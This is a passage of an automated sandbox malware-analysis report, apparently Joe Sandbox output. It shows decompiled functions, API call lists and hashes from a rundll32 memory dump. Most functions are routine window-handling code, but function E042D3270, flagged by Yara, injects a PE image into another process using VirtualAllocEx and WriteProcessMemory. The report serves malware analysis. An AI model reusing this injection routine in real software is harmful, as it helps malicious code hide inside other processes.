                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ClipboardGlobal$AllocDataEmptyOpenWire
                          • String ID:
                          • API String ID: 461592451-0
                          • Opcode ID: 8905d4a0bd54cb6d5b7168b397c47f16bc0287259adee702decd4dd1dcc41093
                          • Instruction ID: 419e6aa0d74d078908d0169a5d05de3d01322361e43ee594c1369550d8c2a866
                          • Opcode Fuzzy Hash: 8905d4a0bd54cb6d5b7168b397c47f16bc0287259adee702decd4dd1dcc41093
                          • Instruction Fuzzy Hash: 8F21B339650704AFF752EBA4DDBAC6DB7BEEB49B00B5204A0F801D3690DA759D10DD24
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E02816044(signed int __eax, struct tagRECT* __edx) {
                          				signed int _v8;
                          				struct tagRECT* _v12;
                          				int _t31;
                          				long _t36;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				if(IsIconic(E02833F7C(_v8)) == 0) {
                          					_t31 = E02834044(_v8, _v12);
                          				} else {
                          					SetRect(_v12, 0, 0, 0, 0);
                          					_t36 = GetWindowLongA(E02833F7C(_v8), 0xffffffec);
                          					_t37 = _v8;
                          					asm("sbb eax, eax");
                          					AdjustWindowRectEx(_v12, GetWindowLongA(E02833F7C(_v8), 0xfffffff0),  ~(_v8 & 0xffffff00 |  *((intOrPtr*)(_t37 + 0x248)) != 0x00000000), _t36);
                          					_t31 = SetRect(_v12, 0, 0,  *((intOrPtr*)(_v8 + 0x48)) - _v12->right + _v12->left,  *((intOrPtr*)(_v8 + 0x4c)) - _v12->bottom + _v12->top);
                          				}
                          				return _t31;
                          			}








                          APIs
                          • IsIconic.USER32(00000000), ref: 02816059
                          • SetRect.USER32(?,00000000,00000000,00000000,00000000), ref: 02816072
                          • GetWindowLongA.USER32(00000000,000000EC), ref: 02816082
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 028160A5
                          • AdjustWindowRectEx.USER32(?,00000000,00000000,000000F0), ref: 028160AF
                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 028160E1
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: RectWindow$Long$AdjustIconic
                          • String ID:
                          • API String ID: 1053891045-0
                          • Opcode ID: 247ef2af8b6001099d9ef2821b3924734eb69d5168432f54b3208406840a8ea0
                          • Instruction ID: 708d7662965a3b0ea42cc08d10d91280cf48cc9efd6d9f0cba790b26e471e5ae
                          • Opcode Fuzzy Hash: 247ef2af8b6001099d9ef2821b3924734eb69d5168432f54b3208406840a8ea0
                          • Instruction Fuzzy Hash: 2C21BF78A04204AFDB11EBACCD85F5EBBBAEF44710F204694A504E7295D731FE409B94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E02833968(void* __eax, int __ecx, int __edx, int _a4, int _a8) {
                          				void* _v20;
                          				struct _WINDOWPLACEMENT _v48;
                          				char _v64;
                          				void* _t31;
                          				int _t45;
                          				int _t51;
                          				void* _t52;
                          				int _t56;
                          				int _t58;
                          
                          				_t56 = __ecx;
                          				_t58 = __edx;
                          				_t52 = __eax;
                          				if(__edx !=  *((intOrPtr*)(__eax + 0x40)) || __ecx !=  *((intOrPtr*)(__eax + 0x44)) || _a8 !=  *((intOrPtr*)(__eax + 0x48))) {
                          					L4:
                          					if(E02834254(_t52) == 0) {
                          						L7:
                          						 *(_t52 + 0x40) = _t58;
                          						 *(_t52 + 0x44) = _t56;
                          						 *((intOrPtr*)(_t52 + 0x48)) = _a8;
                          						 *((intOrPtr*)(_t52 + 0x4c)) = _a4;
                          						_t31 = E02834254(_t52);
                          						__eflags = _t31;
                          						if(_t31 != 0) {
                          							_v48.length = 0x2c;
                          							GetWindowPlacement( *(_t52 + 0x180),  &_v48);
                          							E0282D0F0(_t52,  &_v64);
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							SetWindowPlacement( *(_t52 + 0x180),  &_v48);
                          						}
                          						L9:
                          						E0282CD7C(_t52);
                          						return E027D3408(_t52, _t66);
                          					}
                          					_t45 = IsIconic( *(_t52 + 0x180));
                          					_t66 = _t45;
                          					if(_t45 != 0) {
                          						goto L7;
                          					}
                          					SetWindowPos( *(_t52 + 0x180), 0, _t58, _t56, _a8, _a4, 0x14);
                          					goto L9;
                          				} else {
                          					_t51 = _a4;
                          					if(_t51 ==  *((intOrPtr*)(__eax + 0x4c))) {
                          						return _t51;
                          					}
                          					goto L4;
                          				}
                          			}













                          APIs
                          • IsIconic.USER32(?), ref: 028339A7
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 028339C5
                          • GetWindowPlacement.USER32(?,0000002C), ref: 028339FB
                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 02833A1F
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$Placement$Iconic
                          • String ID: ,
                          • API String ID: 568898626-3772416878
                          • Opcode ID: bc98a04fb28be80d521ac24672d837a924363fcb3188a37bd44da4447f58b5ef
                          • Instruction ID: 7b85010ebd394fa208e2e0f12135ce4af11839a85f8c87e4dc3b0c3ba4ca39b3
                          • Opcode Fuzzy Hash: bc98a04fb28be80d521ac24672d837a924363fcb3188a37bd44da4447f58b5ef
                          • Instruction Fuzzy Hash: 70213179600208ABCF55EF6DD8C4A9AB7A9AF49310F0484A5FD18EF205D771E9098BE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			E0281DF10(int __eax) {
                          				int _v8;
                          				int _t42;
                          
                          				_v8 = __eax;
                          				_t42 = IsIconic( *(_v8 + 0x30));
                          				if(_t42 == 0) {
                          					E0281D508(_v8);
                          					SetActiveWindow( *(_v8 + 0x30));
                          					if( *((intOrPtr*)(_v8 + 0x44)) == 0 ||  *((char*)(_v8 + 0x5b)) == 0 &&  *((char*)( *((intOrPtr*)(_v8 + 0x44)) + 0x57)) == 0 || IsWindowEnabled(E02833F7C( *((intOrPtr*)(_v8 + 0x44)))) == 0) {
                          						E0281CC34( *(_v8 + 0x30), 6);
                          					} else {
                          						SetWindowPos( *(_v8 + 0x30), E02833F7C( *((intOrPtr*)(_v8 + 0x44))),  *( *((intOrPtr*)(_v8 + 0x44)) + 0x40),  *( *((intOrPtr*)(_v8 + 0x44)) + 0x44),  *( *((intOrPtr*)(_v8 + 0x44)) + 0x48), 0, 0x40);
                          						_push(0);
                          						_push(0xf020);
                          						_push(0x112);
                          						_push( *(_v8 + 0x30));
                          						L027D6A3C();
                          					}
                          					_t42 = _v8;
                          					if( *((short*)(_t42 + 0x11a)) != 0) {
                          						return  *((intOrPtr*)(_v8 + 0x118))();
                          					}
                          				}
                          				return _t42;
                          			}






                          APIs
                          • IsIconic.USER32(?), ref: 0281DF1F
                          • SetActiveWindow.USER32(?,?,?,?,?,0281D98B,00000000,0281DE90), ref: 0281DF3B
                          • IsWindowEnabled.USER32(00000000), ref: 0281DF6A
                          • SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000040,00000000,?,?,?,?,?,0281D98B,00000000,0281DE90), ref: 0281DFA8
                          • NtdllDefWindowProc_A.USER32(?,00000112,0000F020,00000000,?,00000000,?,?,?,00000000,00000040,00000000,?,?), ref: 0281DFC0
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$ActiveEnabledIconicNtdllProc_
                          • String ID:
                          • API String ID: 1720852555-0
                          • Opcode ID: f421e66d52269b6831d7aeeda1a22f636f567e25cd1fcfff66484c3c0d4dd0df
                          • Instruction ID: 42a672f56e10d4fc6d54e24004c60b60cd01d7cf7fab481dd39ad2db50458824
                          • Opcode Fuzzy Hash: f421e66d52269b6831d7aeeda1a22f636f567e25cd1fcfff66484c3c0d4dd0df
                          • Instruction Fuzzy Hash: 57317179A00248EFDB10EB99CA85F9D77F9AF08304F550094FA04EB6A2D731EE40DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E027F4DD4(void* __edi, struct HWND__* _a4, signed int _a8) {
                          				struct _WINDOWPLACEMENT _v48;
                          				void* __ebx;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t19;
                          				intOrPtr _t21;
                          				struct HWND__* _t23;
                          
                          				_t19 = _a8;
                          				_t23 = _a4;
                          				if( *0x28658b9 != 0) {
                          					if((_t19 & 0x00000003) == 0) {
                          						if(IsIconic(_t23) == 0) {
                          							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
                          						} else {
                          							GetWindowPlacement(_t23,  &_v48);
                          						}
                          						return E027F4D44( &(_v48.rcNormalPosition), _t19);
                          					}
                          					return 0x12340042;
                          				}
                          				_t21 =  *0x2865894; // 0x27f4dd4
                          				 *0x2865894 = E027F4BD4(1, _t19, _t21, __edi, _t23);
                          				return  *0x2865894(_t23, _t19);
                          			}











                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc
                          • String ID: MonitorFromWindow
                          • API String ID: 190572456-2842599566
                          • Opcode ID: 40d73e43e6ae5f6d38a23b05a07b29c7d0fde8099d20e7940c29dc47e6907646
                          • Instruction ID: 172868959f19303feeaf9b9b1df358ee6c1a887d01632512e06eaf698419d1d9
                          • Opcode Fuzzy Hash: 40d73e43e6ae5f6d38a23b05a07b29c7d0fde8099d20e7940c29dc47e6907646
                          • Instruction Fuzzy Hash: 4201F93694D0085BD741EBA49C989FF77ADEB05210F440411EB2497340E7389D1187A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E042D3270(void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
                          				void* _v8;
                          				void* _v12;
                          				void* _v16;
                          				long _v20;
                          				intOrPtr _v24;
                          				long _v28;
                          				void* _t57;
                          				void* _t59;
                          				void* _t92;
                          				void* _t93;
                          
                          				_t3 = _a8 + 0x3c; // 0xf445c7f8
                          				_v24 = _a8 +  *_t3;
                          				_v16 =  *((intOrPtr*)(_v24 + 0x34));
                          				_v20 =  *((intOrPtr*)(_v24 + 0x50));
                          				_v12 = 0;
                          				_v8 = 0;
                          				_v28 = 0;
                          				while(1) {
                          					_v8 = VirtualAllocEx(_a4, _v16, _v20, 0x3000, 0x40);
                          					if(_v8 == 0) {
                          						_v8 = VirtualAllocEx(_a4, 0, _v20, 0x3000, 0x40);
                          						_v16 = _v8;
                          					}
                          					if(_v8 == 0) {
                          						break;
                          					}
                          					_t57 = E042D1390(_v20);
                          					_t93 = _t92 + 4;
                          					_v12 = _t57;
                          					if(_v12 != 0) {
                          						_t59 = E042D3A00(_a8, _a12, _v12, _v16);
                          						_t92 = _t93 + 0x10;
                          						if(_t59 == 0) {
                          						} else {
                          							if(_a16 != 0) {
                          								 *_a16 = _v16;
                          							}
                          							if(_a20 != 0) {
                          								 *_a20 = _v16 +  *((intOrPtr*)(_v24 + 0x28));
                          							}
                          							if(WriteProcessMemory(_a4, _v8, _v12, _v20, 0) != 0) {
                          								_v28 = 1;
                          								if(0 != 0) {
                          									continue;
                          								}
                          							} else {
                          							}
                          						}
                          					} else {
                          					}
                          					L17:
                          					if(_v12 != 0) {
                          						E042D13D0(_v12);
                          					}
                          					if(_v8 != 0 && _v28 == 0) {
                          						VirtualFreeEx(_a4, _v8, 0, 0x8000);
                          					}
                          					return _v28;
                          				}
                          				goto L17;
                          			}














                          APIs
                          • VirtualAllocEx.KERNEL32(00000000,042D1ECF,FFFFFFFF,00003000,00000040), ref: 042D32BC
                          • VirtualAllocEx.KERNEL32(00000000,00000000,FFFFFFFF,00003000,00000040), ref: 042D32DC
                            • Part of subcall function 042D1390: GetProcessHeap.KERNEL32(?,042D1886,00100000), ref: 042D139C
                            • Part of subcall function 042D1390: RtlAllocateHeap.NTDLL(028F0000,00000000,042D1886,?,042D1886,00100000), ref: 042D13BD
                          • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,FFFFFFFF,00000000), ref: 042D3361
                          • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 042D33A9
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocHeapProcess$AllocateFreeMemoryWrite
                          • String ID:
                          • API String ID: 2713107948-0
                          • Opcode ID: a96fce48b5e58bb261da5f505809a0d7c0cbdad14f3dff1fb9097bdab219b272
                          • Instruction ID: 848ea00ec95acbb7589d2e58e7101f2c15e03a5531a0a26115d3350cbfae4ec1
                          • Opcode Fuzzy Hash: a96fce48b5e58bb261da5f505809a0d7c0cbdad14f3dff1fb9097bdab219b272
                          • Instruction Fuzzy Hash: 4F410AB5F10209EFDB54DF98D984BAEBBB5FF48304F108158E905A7380DB74AA40CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E02818CFC(intOrPtr* __eax, intOrPtr __edx) {
                          				intOrPtr* _v8;
                          				intOrPtr _v12;
                          				struct HDC__* _v16;
                          				struct tagPAINTSTRUCT _v80;
                          				signed short _t37;
                          				signed int _t41;
                          				signed short _t43;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				if(IsIconic(E02833F7C(_v8)) != 0) {
                          					_v16 = BeginPaint(E02833F7C(_v8),  &_v80);
                          					DrawIcon(_v16, 0, 0, E02818B60(_v8));
                          					return EndPaint(E02833F7C(_v8),  &_v80);
                          				}
                          				_t37 =  *0x2818d94; // 0x100
                          				 *(_v8 + 0x54) = _t37 |  *(_v8 + 0x54);
                          				E0283210C(_v8, _v12);
                          				_t41 =  *0x2818d94; // 0x100
                          				_t43 =  !_t41 &  *(_v8 + 0x54);
                          				 *(_v8 + 0x54) = _t43;
                          				return _t43;
                          			}











                          APIs
                          • IsIconic.USER32(00000000), ref: 02818D11
                          • BeginPaint.USER32(00000000,?,00000000), ref: 02818D5E
                          • DrawIcon.USER32(?,00000000,00000000,00000000), ref: 02818D77
                          • EndPaint.USER32(00000000,?,00000000,?,00000000), ref: 02818D89
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Paint$BeginDrawIconIconic
                          • String ID:
                          • API String ID: 2397676602-0
                          • Opcode ID: c3888480533ad737c2da02b796c96e81ab80a671566f9ab5bb4ea414e0b476e0
                          • Instruction ID: c6917399d0069043371acf6bfab675d31fba69c7d9b6dd71284f5bfe5871743e
                          • Opcode Fuzzy Hash: c3888480533ad737c2da02b796c96e81ab80a671566f9ab5bb4ea414e0b476e0
                          • Instruction Fuzzy Hash: 2F11A87CD00209EADB00EBA8DA85A9EB7B9AF48700F204591A914E7251E734EE45DF95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                          			E0280F83C(void* __eax, void* __ebx, void* __edi, void* __esi) {
                          				char _v8;
                          				CHAR* _t20;
                          				long _t25;
                          				intOrPtr _t30;
                          				void* _t34;
                          				intOrPtr _t37;
                          
                          				_push(0);
                          				_t34 = __eax;
                          				_push(_t37);
                          				_push(0x280f8b9);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t37;
                          				E0280F29C(__eax);
                          				_t25 = GetTickCount();
                          				do {
                          					Sleep(0);
                          				} while (GetTickCount() - _t25 <= 0x3e8);
                          				E0280EE9C(_t34, _t25,  &_v8, 0, __edi, _t34);
                          				if(_v8 != 0) {
                          					_t20 = E027D45A8(_v8);
                          					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
                          				}
                          				_pop(_t30);
                          				 *[fs:eax] = _t30;
                          				_push(0x280f8c0);
                          				return E027D40E8( &_v8);
                          			}










                          APIs
                            • Part of subcall function 0280F29C: WinHelpA.USER32(00000000,0280F2B4,00000002,00000000), ref: 0280F2AB
                          • GetTickCount.KERNEL32 ref: 0280F85A
                          • Sleep.KERNEL32(00000000,00000000,0280F8B9,?,?,00000000,00000000,?,0280F832), ref: 0280F863
                          • GetTickCount.KERNEL32 ref: 0280F868
                          • WinHelpA.USER32(00000000,?,?,00000000), ref: 0280F89E
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CountHelpTick$Sleep
                          • String ID:
                          • API String ID: 2438605093-0
                          • Opcode ID: f17e0724bab5c8231e78ac59fdf2f09ecc5efe3e0927e830c63c13dc2568012e
                          • Instruction ID: eb92b49475fe3aaa04994431898ae6495f82416b7bc355be6059802b28c4c4a9
                          • Opcode Fuzzy Hash: f17e0724bab5c8231e78ac59fdf2f09ecc5efe3e0927e830c63c13dc2568012e
                          • Instruction Fuzzy Hash: C701AD3D604208AFF362EBB8DC95B5DB3AEEB18B00F618071E600D3680DB74AE008965
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0281EF78(intOrPtr __eax, void* __ecx, intOrPtr __edx) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				char* _t15;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_t15 =  *0x28644d4; // 0x2865b98
                          				if( *_t15 == 0) {
                          					if(IsIconic( *(_v8 + 0x30)) != 0) {
                          						InvalidateRect( *(_v8 + 0x30), 0, 0xffffffff);
                          					}
                          				} else {
                          					SendMessageA( *(_v8 + 0x30), 0x80, 1, E0281DED8(_v8));
                          					SetClassLongA( *(_v8 + 0x30), 0xfffffff2, E0281DED8(_v8));
                          				}
                          				return E0281EF28(_v8, 0xb01d);
                          			}







                          APIs
                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0281EFA5
                          • SetClassLongA.USER32(?,000000F2,00000000), ref: 0281EFBC
                          • IsIconic.USER32(?), ref: 0281EFCA
                          • InvalidateRect.USER32(?,00000000,000000FF,?), ref: 0281EFDE
                            • Part of subcall function 0281DED8: LoadIconA.USER32(00000000,00007F00), ref: 0281DEFF
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: ClassIconIconicInvalidateLoadLongMessageRectSend
                          • String ID:
                          • API String ID: 3567627762-0
                          • Opcode ID: 6eb797d219f293aeae77b19d75829490eecdc654770ce6cab920041ce2939b29
                          • Instruction ID: e0f0cc15be767e2d04cd0d2727fb9d073d25035b02cb1c88763681d1d7ac4815
                          • Opcode Fuzzy Hash: 6eb797d219f293aeae77b19d75829490eecdc654770ce6cab920041ce2939b29
                          • Instruction Fuzzy Hash: 15011A79A15208AFDB00EBADDA85E5D73FDAB04310F2006C4B914EB6D1CB71EE00DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027D8948(void* __eax) {
                          				short _v6;
                          				short _v8;
                          				struct _FILETIME _v16;
                          				struct _WIN32_FIND_DATAA _v336;
                          				void* _t16;
                          
                          				_t16 = FindFirstFileA(E027D45A8(__eax),  &_v336);
                          				if(_t16 == 0xffffffff) {
                          					L3:
                          					_v8 = 0xffffffff;
                          				} else {
                          					FindClose(_t16);
                          					if((_v336.dwFileAttributes & 0x00000010) != 0) {
                          						goto L3;
                          					} else {
                          						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
                          						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
                          							goto L3;
                          						}
                          					}
                          				}
                          				return _v8;
                          			}









                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 027D8963
                          • FindClose.KERNEL32(00000000,00000000,?), ref: 027D896E
                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 027D8987
                          • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 027D8998
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FileTime$Find$CloseDateFirstLocal
                          • String ID:
                          • API String ID: 2659516521-0
                          • Opcode ID: f47e936372cdf13da450a7d11becc485ddadbc1f085a56d3bbdddaaa5cbca362
                          • Instruction ID: aaeecfdc18f9bf562b35d7b008c0c11412869bc20f1a324a0330f38686f4e51f
                          • Opcode Fuzzy Hash: f47e936372cdf13da450a7d11becc485ddadbc1f085a56d3bbdddaaa5cbca362
                          • Instruction Fuzzy Hash: 63F03C72D0021C6ACF11D7E4DD88ACFB3BC9F09324F500792A555E3191E7349B454F52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E02831990(void* __eax, intOrPtr* __edx) {
                          				char _v20;
                          				char _v28;
                          				intOrPtr _t17;
                          				void* _t19;
                          				void* _t21;
                          				void* _t32;
                          				void* _t39;
                          				void* _t45;
                          				intOrPtr _t47;
                          				intOrPtr _t48;
                          				void* _t50;
                          				void* _t51;
                          				intOrPtr* _t65;
                          				intOrPtr* _t67;
                          				void* _t68;
                          
                          				_t67 = __edx;
                          				_t50 = __eax;
                          				_t17 =  *__edx;
                          				_t68 = _t17 - 0x84;
                          				if(_t68 > 0) {
                          					_t19 = _t17 + 0xffffff00 - 9;
                          					if(_t19 < 0) {
                          						_t21 = E0282DEF8(__eax);
                          						if(_t21 != 0) {
                          							L28:
                          							return _t21;
                          						}
                          						L27:
                          						return E0282EA08(_t50, _t67);
                          					}
                          					if(_t19 + 0xffffff09 - 0xb < 0) {
                          						_t21 = E028318FC(__eax, _t51, __edx);
                          						if(_t21 == 0) {
                          							goto L27;
                          						}
                          						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
                          							goto L28;
                          						}
                          						_t21 = E02834254(_t50);
                          						if(_t21 == 0) {
                          							goto L28;
                          						}
                          						_push( *((intOrPtr*)(_t67 + 8)));
                          						_push( *((intOrPtr*)(_t67 + 4)));
                          						_push( *_t67);
                          						_t32 = E02833F7C(_t50);
                          						_push(_t32);
                          						L027D6A3C();
                          						return _t32;
                          					}
                          					goto L27;
                          				}
                          				if(_t68 == 0) {
                          					_t21 = E0282EA08(__eax, __edx);
                          					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
                          						goto L28;
                          					}
                          					E027D6F90( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
                          					E0282D294(_t50,  &_v28,  &_v20);
                          					_t21 = E02831868(_t50, 0,  &_v28, 0);
                          					if(_t21 == 0) {
                          						goto L28;
                          					}
                          					 *((intOrPtr*)(_t67 + 0xc)) = 1;
                          					return _t21;
                          				}
                          				_t39 = _t17 - 7;
                          				if(_t39 == 0) {
                          					_t65 = E0281381C(__eax);
                          					if(_t65 == 0) {
                          						goto L27;
                          					}
                          					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
                          					if(_t21 == 0) {
                          						goto L28;
                          					}
                          					goto L27;
                          				}
                          				_t21 = _t39 - 1;
                          				if(_t21 == 0) {
                          					if(( *(__eax + 0x54) & 0x00000020) != 0) {
                          						goto L28;
                          					}
                          				} else {
                          					if(_t21 == 0x17) {
                          						_t45 = E02833F7C(__eax);
                          						if(_t45 == GetCapture() &&  *0x2863f7c != 0) {
                          							_t47 =  *0x2863f7c; // 0x0
                          							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
                          								_t48 =  *0x2863f7c; // 0x0
                          								E0282E93C(_t48, 0, 0x1f, 0);
                          							}
                          						}
                          					}
                          				}
                          			}



















                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Capture
                          • String ID:
                          • API String ID: 1145282425-3916222277
                          • Opcode ID: 554c501464acd9539b886085287412b996df7362b6811acd5b6fff50d3b5b509
                          • Instruction ID: f183c2e409517a8192e126abb9ef784a819b09cd1d03738f35b8682038821361
                          • Opcode Fuzzy Hash: 554c501464acd9539b886085287412b996df7362b6811acd5b6fff50d3b5b509
                          • Instruction Fuzzy Hash: B331B03D7006004BC722AA7CC88C71F63AA9F44B1AF04996AE45EC7685DB34D869CBF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0281B2E0(intOrPtr* __eax, signed int __ecx, intOrPtr __edx) {
                          				intOrPtr* _v8;
                          				intOrPtr _v12;
                          				void* __ebp;
                          				intOrPtr _t27;
                          				signed int _t47;
                          				void* _t55;
                          				void* _t62;
                          
                          				_t47 = __ecx;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				if( *(_v12 + 4) != 2 ||  *((char*)(_v8 + 0x9b)) == 1 || ( *(_v8 + 0x1c) & 0x00000010) != 0 || IsIconic(E02833F7C(_v8)) != 0 || E02832A18(_v8) <= 0) {
                          					_t27 = E02818FC0(_v8, _t47, _v12);
                          				} else {
                          					SetWindowPos(E02833F7C(_v8), 0, 0, 0, 0, 0, 7);
                          					PostMessageA(E02833F7C(_v8), 0xa2,  *(_v12 + 4),  *(_v12 + 8));
                          					_t27 = _v8;
                          					if( *((char*)(_t27 + 0x22e)) != 0) {
